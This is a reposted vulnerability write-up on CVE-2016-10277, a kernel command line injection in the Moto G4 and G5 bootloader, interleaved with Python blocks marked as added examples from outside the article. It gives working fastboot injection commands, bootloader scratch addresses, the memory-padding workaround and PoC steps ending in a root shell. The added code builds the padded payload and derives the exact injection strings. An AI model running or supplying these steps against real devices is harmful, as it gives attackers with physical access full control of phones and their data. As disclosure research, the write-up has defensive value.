MYHACK58:62201787008 (myhack58, author: anonymous)
History: Jun 13, 2017 - 12:00 a.m.

Motorola G4 & G5 phones found to contain a high-risk kernel command line injection vulnerability - vulnerability warning - Heiba Security Net (黑吧安全网, www.myhack58.com)

2017-06-13 00:00:00, 803 views

CVSS3: 7.8 High
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector: LOCAL; Attack Complexity: LOW; Privileges Required: NONE; User Interaction: REQUIRED; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH

CVSS2: 9.3 High
AV:N/AC:M/Au:N/C:C/I:C/A:C
Access Vector: NETWORK; Access Complexity: MEDIUM; Authentication: NONE; Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE

EPSS: 0.002 Low (percentile 55.0%)

Note that the CVSS3 vector rates the attack as local: the PoC below is driven over USB with the device in fastboot mode.

In our previous article on the Nexus 6 root vulnerability we noted that CVE-2016-10277 would likely affect Motorola devices as well. Reports that later reached us on Twitter confirmed that conjecture.
To prove that Motorola devices are affected by this high-risk vulnerability, we obtained two Motorola phones and upgraded them to the latest system version:
1. Moto G4 (athene, XT1622), system version NPJS25.93-14.4, bootloader moto-msm8952-B1.05; and
2. Moto G5 (cedric, XT1676), system version NPP25.137-33, bootloader moto-msm8937-B8.09.
Recap of that article
1. The Motorola Android Bootloader (ABOOT) contains a vulnerability that lets an attacker inject arguments into the kernel command line.
2. We can inject an "initrd" parameter, which forces the Linux kernel to populate the rootfs from an initramfs located at a physical address we specify.
3. We can use ABOOT's download function to place our malicious initramfs at a known physical address, SCRATCH_ADDR (0x11000000 on the Nexus 6).
4. An attacker can therefore use this vulnerability to obtain an unrestricted root shell.
Verifying CVE-2016-10277 on the Moto G4 & G5
Experiments show that both devices are indeed affected, and exploitation is very simple. Running fastboot oem config fsg-id "a androidboot.foo=bar" is enough to create the ro.boot.foo property:
$ fastboot oem config fsg-id "a androidboot.foo=bar"
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     androidboot.foo=bar
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>
OKAY [  0.013s]

$ fastboot continue
$ adb shell
cedric:/ $ getprop ro.boot.foo
bar
cedric:/ $
This means we injected our parameter into cedric's kernel command line. Next we confirmed that we can control the initrd parameter, which lets us force the Linux kernel to load the initramfs from a physical address of our choosing: running fastboot oem config fsg-id "a initrd=0x12345678,1234" (a bogus address and size) makes the kernel crash at boot.
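The mechanism behind the getprop check above, as an added example that is not code from the article or from Motorola: a space inside an attacker-controlled bootloader setting becomes a separate kernel command line argument, and Android init turns every androidboot.X=Y argument into an ro.boot.X property. The page only shows that the fsg-id value ends up on the command line; the assumption here is that ABOOT appends "fsg-id=<value>" verbatim to a fixed base string. The base string and the build_cmdline_* function names are constructed for this example, and the hardened variant shows the input validation that would close the hole.

```python
"""
Added example (not the article's or Motorola's code): how a space inside an
attacker-controlled bootloader setting turns into a separate kernel command
line argument, and why Android init then exposes it as an ro.boot.* property.

Assumption not stated on the page: ABOOT builds the command line by appending
"fsg-id=<value>" verbatim to a fixed base string. BASE_CMDLINE and the
build_cmdline_* names are constructed for this example.
"""
import re
from typing import Dict, List

# Constructed sample base command line; not copied from a real device.
BASE_CMDLINE = "console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31"


def split_cmdline(cmdline: str) -> List[str]:
    """Split a kernel command line into arguments the way the kernel's
    parse_args()/next_arg() does: on whitespace, except inside double quotes."""
    args, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
            cur.append(ch)
        elif ch.isspace() and not in_quotes:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_cmdline(cmdline: str) -> Dict[str, str]:
    """Map each key=value argument to a dict (bare flags map to "").
    A value wrapped in double quotes has the quotes stripped, as the kernel does."""
    params = {}
    for arg in split_cmdline(cmdline):
        key, _, value = arg.partition("=")
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        params[key] = value
    return params


def boot_properties(cmdline: str) -> Dict[str, str]:
    """Mimic Android init's import_kernel_cmdline(): every androidboot.X=Y
    argument becomes the read-only property ro.boot.X=Y."""
    prefix = "androidboot."
    return {"ro.boot." + k[len(prefix):]: v
            for k, v in parse_cmdline(cmdline).items() if k.startswith(prefix)}


def build_cmdline_vulnerable(fsg_id: str) -> str:
    """Assumed vulnerable pattern: the user-writable utag value is appended
    unquoted, so a space inside it starts a new kernel argument."""
    return f"{BASE_CMDLINE} fsg-id={fsg_id}"


def build_cmdline_hardened(fsg_id: str) -> str:
    """Hardened pattern: only accept a strict identifier, so the value can
    carry neither argument separators nor extra key=value pairs."""
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,32}", fsg_id):
        raise ValueError(f"rejected fsg-id value: {fsg_id!r}")
    return f"{BASE_CMDLINE} fsg-id={fsg_id}"


if __name__ == "__main__":
    payload = "a androidboot.foo=bar"   # the value from the fastboot command above
    print(parse_cmdline(build_cmdline_vulnerable(payload)))
    print(boot_properties(build_cmdline_vulnerable(payload)))
    try:
        build_cmdline_hardened(payload)
    except ValueError as err:
        print(err)
```

With the vulnerable builder, "fsg-id" receives only the throwaway token "a" and androidboot.foo=bar is parsed as its own argument, which is exactly why getprop ro.boot.foo returns bar. The same string rejected by build_cmdline_hardened never reaches the kernel.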
As noted above, before testing the vulnerability on the G4 & G5 devices we had to satisfy two device-specific requirements:
1. Find the SCRATCH_ADDR value used by the bootloader.
2. Create a malicious initramfs.
Finding the SCRATCH_ADDR value
After loading the athene and cedric ABOOT images into IDA, we quickly found the SCRATCH_ADDR value for each:
//athene
signed int target_get_scratch_address()
{
  return 0x90000000;
}

//cedric
signed int target_get_scratch_address()
{
  return 0xA0100000;
}
Verifying the SCRATCH_ADDR value
Before explaining how the malicious initramfs is built, we need to confirm that the SCRATCH_ADDR values are correct; otherwise the results of our analysis would be unreliable.
To verify the address, we extracted the original initramfs from Motorola's official firmware image and then used the vulnerability to load that official initramfs from SCRATCH_ADDR:

$ fastboot oem config fsg-id "a initrd=0x90000000,1766036"
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     initrd=0x90000000,1766036
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s

$ fastboot flash aleph initramfs.cpio.gz
target reported max download size of 536870912 bytes
sending 'aleph' (1725 KB)...
OKAY [  1.088s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.095s

$ fastboot continue
The initramfs did not load properly; the device entered an endless reboot loop, which was quite puzzling.
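The extraction step mentioned above (pulling the stock initramfs out of the official firmware so that its size, 1766036 bytes here, can be passed in initrd=), as an added example that is not the article's code: a parser for the classic v0 Android boot image header that AOSP's mkbootimg writes. The boot image and ramdisk built by make_sample_boot_img() and make_sample_ramdisk() are constructed test data, not a real Motorola boot.img; on a real firmware you would pass the bytes of the boot partition image instead.

```python
"""
Added example (not the article's code): pull the ramdisk (initramfs) out of
an Android boot image, the step the text describes for obtaining the official
initramfs from Motorola's firmware. The header layout is AOSP's v0
boot_img_hdr as written by mkbootimg. make_sample_boot_img() and
make_sample_ramdisk() produce constructed test data, not a real boot.img.
"""
import gzip
import struct

BOOT_MAGIC = b"ANDROID!"
# v0 header: magic, kernel_size, kernel_addr, ramdisk_size, ramdisk_addr,
# second_size, second_addr, tags_addr, page_size, two unused words,
# 16-byte name, 512-byte cmdline (id[8] and extra_cmdline follow; unused here)
HDR_FMT = "<8s10I16s512s"
HDR_SIZE = struct.calcsize(HDR_FMT)


def _page_align(n: int, page_size: int) -> int:
    return (n + page_size - 1) // page_size * page_size


def parse_boot_img(img: bytes) -> dict:
    """Return the kernel, ramdisk and cmdline of a v0 Android boot image."""
    if len(img) < HDR_SIZE:
        raise ValueError("image too short for a boot header")
    (magic, kernel_size, kernel_addr, ramdisk_size, ramdisk_addr,
     _second_size, _second_addr, tags_addr, page_size, _unused0, _unused1,
     name, cmdline) = struct.unpack_from(HDR_FMT, img, 0)
    if magic != BOOT_MAGIC:
        raise ValueError("not an Android boot image")
    if page_size not in (2048, 4096, 8192, 16384, 32768, 65536, 131072):
        raise ValueError(f"implausible page size {page_size}")
    kernel_off = page_size                            # the header occupies one page
    ramdisk_off = kernel_off + _page_align(kernel_size, page_size)
    if ramdisk_off + ramdisk_size > len(img):
        raise ValueError("ramdisk extends past the end of the image")
    return {
        "name": name.rstrip(b"\0").decode(),
        "page_size": page_size,
        "kernel_addr": kernel_addr,
        "ramdisk_addr": ramdisk_addr,
        "tags_addr": tags_addr,
        "cmdline": cmdline.rstrip(b"\0").decode(),
        "kernel": img[kernel_off:kernel_off + kernel_size],
        "ramdisk": img[ramdisk_off:ramdisk_off + ramdisk_size],
    }


def ramdisk_is_gzip_cpio(ramdisk: bytes) -> bool:
    """A stock initramfs is a gzip'd newc cpio archive; check both magics."""
    if ramdisk[:2] != b"\x1f\x8b":
        return False
    return gzip.decompress(ramdisk)[:6] == b"070701"


def make_sample_ramdisk() -> bytes:
    """Constructed minimal ramdisk: newc cpio holding only the TRAILER!!! record, gzip'd."""
    name = b"TRAILER!!!\0"
    # ino mode uid gid nlink mtime filesize devmajor devminor rdevmajor rdevminor namesize check
    fields = [0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, len(name), 0]
    body = b"070701" + b"".join(b"%08x" % f for f in fields) + name
    body += b"\0" * (-len(body) % 4)                  # newc records are 4-byte aligned
    return gzip.compress(body, mtime=0)


def make_sample_boot_img(kernel: bytes, ramdisk: bytes, cmdline: bytes,
                         page_size: int = 2048) -> bytes:
    """Constructed v0 boot image laid out like mkbootimg: header page, then the
    kernel and ramdisk each padded to a page boundary. Load addresses are arbitrary."""
    hdr = struct.pack(HDR_FMT, BOOT_MAGIC, len(kernel), 0x80008000, len(ramdisk),
                      0x82000000, 0, 0, 0x81E00000, page_size, 0, 0, b"sample", cmdline)

    def pad(b: bytes) -> bytes:
        return b.ljust(_page_align(len(b), page_size), b"\0")

    return pad(hdr) + pad(kernel) + pad(ramdisk)


if __name__ == "__main__":
    img = make_sample_boot_img(b"\x90" * 5000, make_sample_ramdisk(),
                               b"console=ttyHSL0 androidboot.hardware=qcom")
    info = parse_boot_img(img)
    print(info["cmdline"], len(info["ramdisk"]), ramdisk_is_gzip_cpio(info["ramdisk"]))
```

The length of the extracted ramdisk is the number that goes after the comma in initrd=<addr>,<size>; the stock cmdline field is also worth reading, since anything injected through fsg-id is appended to it.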
Padding the payload
We made a bold guess that turned out to be right: after our initramfs is loaded at SCRATCH_ADDR, and before ABOOT jumps to the Linux kernel, the cedric and athene ABOOT write some other, unrelated data to SCRATCH_ADDR, corrupting the start of our initramfs (but not all of it).
So, as long as we put some padding in front of the initramfs and adjust the initrd parameter accordingly (initrd = SCRATCH_ADDR + sizeof(PADDING)), the crash should go away. If the hypothesis is correct, memory should look as follows just before the Linux kernel starts:
[Figure: memory layout at kernel entry: PADDING at SCRATCH_ADDR, followed by the initramfs at SCRATCH_ADDR + sizeof(PADDING)]
We padded with 32 MB (0x2000000) of data, and this solved the infinite reboot problem.
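The padding arithmetic above, as an added example that is not the article's PoC code: build the padded image and derive the matching initrd= argument for each device. The SCRATCH_ADDR values, the 32 MB padding and the fastboot download limit are the ones printed on this page; applying the same padding to cedric is an assumption, since the page only shows the resulting command for athene. The initramfs bytes in the demo are constructed placeholder data rather than a real initroot image.

```python
"""
Added example (not the article's PoC code): build the padded image the text
describes and derive the matching initrd= argument. SCRATCH_ADDR values,
the 32 MB padding and the download limit are taken from the page; using the
same padding on cedric is an assumption. The demo initramfs is constructed
placeholder data, not a real initroot archive.
"""
import gzip

SCRATCH_ADDR = {"athene": 0x90000000, "cedric": 0xA0100000}   # from the IDA output above
PADDING = 0x2000000                                            # 32 MB, as used on the page
MAX_DOWNLOAD = 536870912                                       # "max download size" reported by fastboot


def build_padded_payload(initramfs: bytes, padding: int = PADDING) -> bytes:
    """Prepend zero padding so ABOOT's later writes at SCRATCH_ADDR land in the
    filler rather than in the cpio archive."""
    return b"\0" * padding + initramfs


def initrd_arg(device: str, initramfs: bytes, padding: int = PADDING) -> str:
    """initrd=<phys addr>,<size>: the kernel reads the archive starting at
    SCRATCH_ADDR + padding, and the size is that of the unpadded initramfs."""
    return f"initrd=0x{SCRATCH_ADDR[device] + padding:X},{len(initramfs)}"


def fsg_id_value(device: str, initramfs: bytes, padding: int = PADDING) -> str:
    """The string given to `fastboot oem config fsg-id`; "a" is the throwaway
    token the article uses, and the space after it starts a new kernel argument."""
    return f"a {initrd_arg(device, initramfs, padding)}"


def check_payload(payload: bytes, padding: int = PADDING) -> None:
    """Sanity checks before flashing: the blob fits the download buffer, and the
    gzip magic sits exactly at the offset the initrd= address points to."""
    if len(payload) > MAX_DOWNLOAD:
        raise ValueError(f"payload is {len(payload)} bytes, over the {MAX_DOWNLOAD} byte limit")
    if payload[padding:padding + 2] != b"\x1f\x8b":
        raise ValueError("no gzip header at SCRATCH_ADDR + padding; initrd= would point at garbage")


if __name__ == "__main__":
    # Constructed placeholder: a real run would read initroot-<device>.cpio.gz here.
    fake_initramfs = gzip.compress(b"constructed placeholder, not a real cpio archive")
    payload = build_padded_payload(fake_initramfs)
    check_payload(payload)
    for dev in SCRATCH_ADDR:
        print(dev, fsg_id_value(dev, fake_initramfs))
```

The padded blob is what gets sent with fastboot flash aleph (the bogus partition name makes the write fail after the download has already landed at SCRATCH_ADDR), and fsg_id_value() is the string for fastboot oem config fsg-id; for a 1774281-byte athene image it yields exactly the "a initrd=0x92000000,1774281" used below.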
Creating the Moto G4 & G5 initramfs and the PoC
As in the Nexus 6 case, in order to build an initramfs that yields an unrestricted root shell over adb, we compiled an AOSP userdebug image. We chose userdebug because its SELinux policy allows su to reach the privileged domain, and its adbd can be controlled through some system properties.
The updated PoC is available in our GitHub repository. [PoC link]
With the above in place, running our PoC gives us a root shell.
Moto G4:
$ fastboot oem config fsg-id "a initrd=0x92000000,1774281"
$ fastboot flash aleph initroot-athene.cpio.gz
$ fastboot continue

$ adb shell
athene:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
